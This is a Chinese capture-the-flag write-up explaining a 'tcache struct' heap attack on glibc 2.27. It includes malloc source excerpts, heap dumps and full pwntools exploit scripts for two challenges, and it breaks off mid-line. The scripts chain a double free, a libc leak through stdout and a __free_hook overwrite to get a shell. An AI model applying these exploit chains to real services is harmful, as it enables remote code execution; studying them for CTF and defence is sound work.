随着CTF的水平的不断提升,原来的一些常规堆题的技术手段已经不足以撑起比较高水平的比赛的质量了。最近发现一类罕见的攻击手段,我姑且把它叫做tache struct attack,它区别于以往的tcache attack题目的篡改tache的fd指针,实现任意地址读写,更多的是利用tache链表保存在heap上的特性,在heap地址、libc地址等偏移地址未知以及申请堆块数量有限制的情况下在tcache attack技术上更进一步进行漏洞利用。相对于fastbin attack技术需要的利用条件更少,利用范围更广。本文只是对tcache struct attack技术的初步探讨,更多细节欢迎各路大佬与我讨论。
tcache_init(void) { mstate ar_ptr; void *victim = 0; const size_t bytes = sizeof (tcache_perthread_struct); if (tcache_shutting_down) return; arena_get (ar_ptr, bytes); victim = _int_malloc (ar_ptr, bytes); if (!victim && ar_ptr != NULL) { ar_ptr = arena_get_retry (ar_ptr, bytes); victim = _int_malloc (ar_ptr, bytes); } if (ar_ptr != NULL) __libc_lock_unlock (ar_ptr->mutex); /* In a low memory situation, we may not be able to allocate memory - in which case, we just keep trying later. However, we typically do this very early, so either there is sufficient memory, or there isn't enough memory to do non-trivial allocations anyway. */ if (victim) { tcache = (tcache_perthread_struct *) victim; memset (tcache, 0, sizeof (tcache_perthread_struct)); } }
typedef struct tcache_perthread_struct { char counts[TCACHE_MAX_BINS];//0x40 tcache_entry *entries[TCACHE_MAX_BINS];//0x40 } tcache_perthread_struct;
//64位 int main() { char* p = malloc(0x10); free(p); p = malloc(0x20); free(p); return 0; }
0x13db000: 0x0000000000000000 0x0000000000000251
0x13db010: 0x0000000000000101 0x0000000000000000
0x13db020: 0x0000000000000000 0x0000000000000000
0x13db030: 0x0000000000000000 0x0000000000000000
0x13db040: 0x0000000000000000 0x0000000000000000
0x13db050: 0x00000000013db260 0x00000000013db280
... : 0
0x13db250: 0x0000000000000000 0x0000000000000021
0x13db260: 0x0000000000000000 0x0000000000000000
0x13db270: 0x0000000000000000 0x0000000000000031
0x13db280: 0x0000000000000000 0x0000000000000000
0x13db290: 0x0000000000000000 0x0000000000000000
0x13db2a0: 0x0000000000000000 0x0000000000020d61
#if USE_TCACHE { size_t tc_idx = csize2tidx (size); if (tcache && tc_idx < mp_.tcache_bins && tcache->counts[tc_idx] < mp_.tcache_count)//<7 { tcache_put (p, tc_idx); return; } } #endif
在将chunk放入tcahce的时候会检查tcache->counts[tc_idx] < mp_.tcache_count
#if USE_TCACHE /* int_free also calls request2size, be careful to not pad twice. */ size_t tbytes; checked_request2size (bytes, tbytes); size_t tc_idx = csize2tidx (tbytes); MAYBE_INIT_TCACHE (); DIAG_PUSH_NEEDS_COMMENT; if (tc_idx < mp_.tcache_bins /*&& tc_idx < TCACHE_MAX_BINS*/ /* to appease gcc */ && tcache && tcache->entries[tc_idx] != NULL) { return tcache_get (tc_idx); } DIAG_POP_NEEDS_COMMENT; #endif
以下题目只侧重分析tcache struct攻击部分
int fr() { free(realloc_ptr); return puts("Done"); }
程序中free指针没有清零造成double free漏洞,利用realloc函数分配,没有输出函数,开启全保护。
利用double free漏洞修改fd的低2个字节指向heap开头,也就是tcache struct的位置。修改tcache->counts为很大的数,绕过检查。free掉unsortedbin,在tcache_entry上踩下main_arena地址,再部分覆盖攻击stdout泄露libc,最后用相同方法劫持free_hook。
rea(0x68) free() rea(0x18) rea(0) rea(0x48) free() rea(0)
利用悬空指针未清零形成double free。
heap = 0x7010 stdout= 0x2760 #dbg() #ipy() rea(0x68, 'a' * 0x18 + p64(0x201) + p16(heap))#size + fd
爆破部分覆盖tcache的fd指针低2个字节,使其指向tcache struct。同时修改size以便后面获得unsortedbin。
rea(0) rea(0x48) rea(0) rea(0x48, '\xff' * 0x40)
分配两次获得tache struct的指针,修改tcache->counts为0xff,使得后面free的chunk都不会进入tache中。
pwndbg> bin tcachebins 0x20 [ -1]: 0x561fd9868260 0x30 [ -1]: 0 0x40 [ -1]: 0 0x50 [ -1]: 0x1000002 0x60 [ -1]: 0 ... 0x1f0 [ -1]: 0 0x200 [ -1]: 0x561fd9868280
rea(0x58, 'a' * 0x18 + '\x00' * 0x20 + p64(0x1f1) + p16(heap + 0x40))#change tcache fake chunk
rea(0) rea(0x18, p64(0) + p64(0))#chunk overlap rea(0) #stdout rea(0x1e8,p64(0) * 4 + p16(stdout))#tcache attack rea(0) rea(0x58, p64(0xfbad1800) + p64(0) * 3 +p8(0xc8)) lb = uu64(ru('\x7f',drop=False)[-6:])-libc.symbols['_IO_2_1_stdin_'] success('libc_base: ' + hex(lb))
sla('>> ',666)#ptr=0 rea(0x1e8, 'a' * 0x18 + p64(lb + libc.sym['__free_hook'] - 8)) rea(0) rea(0x48, '/bin/sh\x00' + p64(lb + libc.sym['system'])) free() irt()
from PwnContext import * try: from IPython import embed as ipy except ImportError: print ('IPython not installed.') if __name__ == '__main__': #context.terminal = ['tmux', 'splitw', '-h'] # # functions for quick script s = lambda data :ctx.send(str(data)) #in case that data is an int sa = lambda delim,data :ctx.sendafter(str(delim), str(data)) sl = lambda data :ctx.sendline(str(data)) sla = lambda delim,data :ctx.sendlineafter(str(delim), str(data)) r = lambda numb=4096 :ctx.recv(numb) ru = lambda delims, drop=True :ctx.recvuntil(delims, drop) irt = lambda :ctx.interactive() rs = lambda *args, **kwargs :ctx.start(*args, **kwargs) dbg = lambda gs='', **kwargs :ctx.debug(gdbscript=gs, **kwargs) # misc functions uu32 = lambda data :u32(data.ljust(4, '\0')) uu64 = lambda data :u64(data.ljust(8, '\0')) ctx.binary = './realloc_magic' ctx.custom_lib_dir = '/home/leo/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/'#remote libc ctx.remote_libc = '/home/leo/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so' ctx.debug_remote_libc = True libc = ELF('/home/leo/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so') rs() ctx.breakpoints = [0xbcd] ctx.symbols = {'lst':0x202058,} logg=0 if logg: context.log_level = 'debug' def rea(sz, c='\n'): sla('>> ',1) sla('?', sz) if sz: sa('?', c) def free(): sla('>> ',2) #double free rea(0x68) free() rea(0x18) rea(0) rea(0x48) free() rea(0) heap = 0x7010 stdout= 0x2760 dbg() ipy() rea(0x68, 'a' * 0x18 + p64(0x201) + p16(heap))#size + fd rea(0) rea(0x48) rea(0) rea(0x48, '\xff' * 0x40) rea(0x58, 'a' * 0x18 + '\x00' * 0x20 + p64(0x1f1) + p16(heap + 0x40))#change tcache fake chunk rea(0) rea(0x18, p64(0) + p64(0))#chunk overlap rea(0) #stdout rea(0x1e8,p64(0) * 4 + p16(stdout))#tcache attack rea(0) rea(0x58, p64(0xfbad1800) + p64(0) * 3 +p8(0xc8)) lb = uu64(ru('\x7f',drop=False)[-6:])-libc.symbols['_IO_2_1_stdin_'] success('libc_addr: ' + hex(lb)) sla('>> ',666)#ptr=0 rea(0x1e8, 'a' * 0x18 + p64(lb + libc.sym['__free_hook'] - 8)) rea(0,) rea(0x48, '/bin/sh\x00' + p64(lb + libc.sym['system'])) free() irt()
printf("index:"); v1 = sub_B4E(); if ( v1 >= 0 && v1 <= 9 ) { if ( qword_202080[v1] ) ptr = (void *)qword_202080[v1]; if ( ptr ) { free(ptr);//double free qword_202080[v1] = 0LL; puts("done!"); }
程序中free指针同样是没有清零造成double free漏洞,没有输出函数,固定malloc的大小为0x40,开启全保护。
add('0') add('2') delete(0) delete(0) tcache = 0x6010#tcache_entry stdout = 0x6760 dbg() ipy() add(p16(tcache))#tcache attack add('0') add('\xff'*0x40)#tcache_count 0x6010
先利用double free漏洞部分覆盖fd指针为tcache结构体,将tcache->counts写成0xff使得chunk不会释放进tcache。
delete(3)#get unsortedbin add('\x01'*0x40)#recover tcache_count delete(0) edit(2,p16(stdout))#stdout attack
由于程序限制了malloc出来的chunk大小为0x40,而利用tcache struct attack可以获得tache struct结构体指针,从而将这块chunk free掉就可以绕过限制,在tcahce struct上踩出main_arena地址。
add('0') add(p64(0xfbad1800)+p64(0)*3+